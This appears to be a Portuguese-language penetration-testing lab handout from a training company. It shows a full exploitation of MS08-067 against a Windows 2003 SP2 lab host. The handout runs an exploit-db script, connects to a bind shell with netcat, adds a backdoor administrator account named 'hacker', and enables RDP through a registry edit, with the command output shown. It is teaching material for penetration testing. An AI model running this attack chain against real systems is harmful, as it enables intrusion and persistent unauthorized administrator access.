Laboratório

Exploração –invasão de sistemas

Invasão de Sistemas

Bug em Software - Buffer Overflow – S.O Windows 2003 – SP2

Procurando exploits off-line

root@kali:~# cd /usr/share/exploitdb/
root@kali: /usr/share/exploitdb/# ls
files.csv platforms searchsploit
root@kali:/usr/share/exploitdb# ./searchsploit ms08
Description Path
--------------------------------------------------------------------------- -------------------------
Microsoft Office .WPS File Stack Overflow Exploit (MS08-011) /windows/local/5107.c
Microsoft Office Excel Code Execution Exploit (MS08-014) /windows/local/5287.txt
Microsoft Office XP SP3 PPT File Buffer Overflow Exploit (ms08-016) /windows/local/5320.txt
MS Windows GDI Image Parsing Stack Overflow Exploit (MS08-021) /windows/local/5442.cpp
MS Windows XP SP2 (win32k.sys) Privilege Escalation Exploit (MS08-025) /windows/local/5518.txt
Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053) /windows/remote/6454.html
MS Internet Explorer GDI+ Proof of Concept (MS08-052) /windows/dos/6619.html
MS Windows GDI (EMR_COLORMATCHTOTARGETW) Exploit MS08-021 /windows/remote/6656.txt
MS Windows GDI+ Proof of Concept (MS08-052) #2 /windows/dos/6716.pl
MS Windows InternalOpenColorProfile Heap Overflow PoC (MS08-046) /windows/dos/6732.txt
MS Windows Server Service Code Execution PoC (MS08-067) /windows/dos/6824.txt
MS Windows Server Service Code Execution Exploit (MS08-067) (Univ) /windows/remote/6841.txt
MS Windows Server Service Code Execution Exploit (MS08-067) /windows/remote/7104.c
SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068) /windows/remote/7125.txt
MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3) /windows/remote/7132.py
Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069 /windows/remote/7196.html
root@kali:/usr/share/exploitdb#

Copiar o exploit para /root e verificar seu funcionamento

root@kali:/usr/share/exploitdb# locate 7132.py
/usr/share/exploitdb/platforms/php/webapps/17132.py
/usr/share/exploitdb/platforms/windows/remote/7132.py
root@kali:/usr/share/exploitdb# cp
/usr/share/exploitdb/platforms/windows/remote/7132.py /root/lab_exploit/
root@kali:/usr/share/exploitdb# cd /root/lab_exploit/

Solution Consultoria e Treinamento

www.solution-rj.com.br
Rua da Assembleia, n° 93, sala 1607, Centro – Rio de Janeiro/RJ.
Email: solution@solution-rj.com.br/Tel: 55 (21) 3179-0081 / 96972-4755 / 98732-9993 1
root@kali:~/lab_exploit# ls
7132.py
root@kali:/usr/share/exploitdb# more 7132.py

Vamos tentar executá-lo (temos que passar os parâmetros IP da vítima e o número

do alvo, "1" para windows 2000 e "2" para windows 2003 SP2). Alvo WinXamp -
172.16.50.40
root@kali:~/lab_exploit# ./7132.py 172.16.50.40 2
####################################################################
###
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# www.coffeeandsecurity.com
# Email: d3basis.m0hanty @ gmail.com
####################################################################
###

[-]Windows 2003[SP2] payload loaded

[-]Initiating connection
[-]connected to ncacn_np:172.16.50.10[\pipe\browser]
[-]Exploit sent to target successfully...
[1]Telnet to port 4444 on target machine...
root@kali:~/lab_exploit# nc -nv 172.16.50.40 4444
(UNKNOWN) [172.16.50.40] 4444 (?) open
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection 2:

Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 172.16.50.40
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.50.100

C:\WINDOWS\system32>

Solution Consultoria e Treinamento

www.solution-rj.com.br
Rua da Assembleia, n° 93, sala 1607, Centro – Rio de Janeiro/RJ.
Email: solution@solution-rj.com.br/Tel: 55 (21) 3179-0081 / 96972-4755 / 98732-9993 2
 E agora????? Para continuar temos que conhecer linha de comando, registro do
windows etc.
C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator ASPNET bob
Guest SUPPORT_388945a0
The command completed with one or more errors.

C:\WINDOWS\system32>

Usando o NMAP - verificar q RDP está parado

root@kali:~# nmap -p 3389 172.16.50.40

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-07-02 19:33 BRT

Nmap scan report for 172.16.50.40
Host is up (0.00042s latency).
PORT STATE SERVICE
3389/tcp closed ms-term-serv

Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds

root@kali:~#

criando usuário e colocando no grupo de administradores

C:\WINDOWS\system32>net user hacker hacker /add
net user hacker hacker /add
The command completed successfully.
C:\WINDOWS\system32>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.
C:\WINDOWS\system32>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator ASPNET bob
Guest hacker SUPPORT_388945a0

Solution Consultoria e Treinamento

www.solution-rj.com.br
Rua da Assembleia, n° 93, sala 1607, Centro – Rio de Janeiro/RJ.
Email: solution@solution-rj.com.br/Tel: 55 (21) 3179-0081 / 96972-4755 / 98732-9993 3
The command completed with one or more errors.
C:\WINDOWS\system32>

Verificando se o usuário está no grupo Administrators

C:\WINDOWS\system32>net localgroup administrators
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
hacker
The command completed successfully.
C:\WINDOWS\system32>

Habilitando o acesso remoto via RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v
fDenyTSConnections /t REG_DWORD /d 0
C:\WINDOWS\system32> reg add
"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v
fDenyTSConnections /t REG_DWORD /d 0
Value fDenyTSConnections exists, overwrite(Yes/No)? yes
The operation completed successfully.

Verificando novamente com NMAP e fazendo o acesso

root@kali:~# nmap -p 3389 172.16.50.40
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-07-02 19:53 BRT
Nmap scan report for 172.16.50.10
Host is up (0.00058s latency).
PORT STATE SERVICE
3389/tcp open ms-term-serv
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
root@kali:~#

Acessando via RDP

Solution Consultoria e Treinamento

www.solution-rj.com.br
Rua da Assembleia, n° 93, sala 1607, Centro – Rio de Janeiro/RJ.
Email: solution@solution-rj.com.br/Tel: 55 (21) 3179-0081 / 96972-4755 / 98732-9993 4
 Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua da Assembleia, n° 93, sala 1607, Centro – Rio de Janeiro/RJ.
Email: solution@solution-rj.com.br/Tel: 55 (21) 3179-0081 / 96972-4755 / 98732-9993 5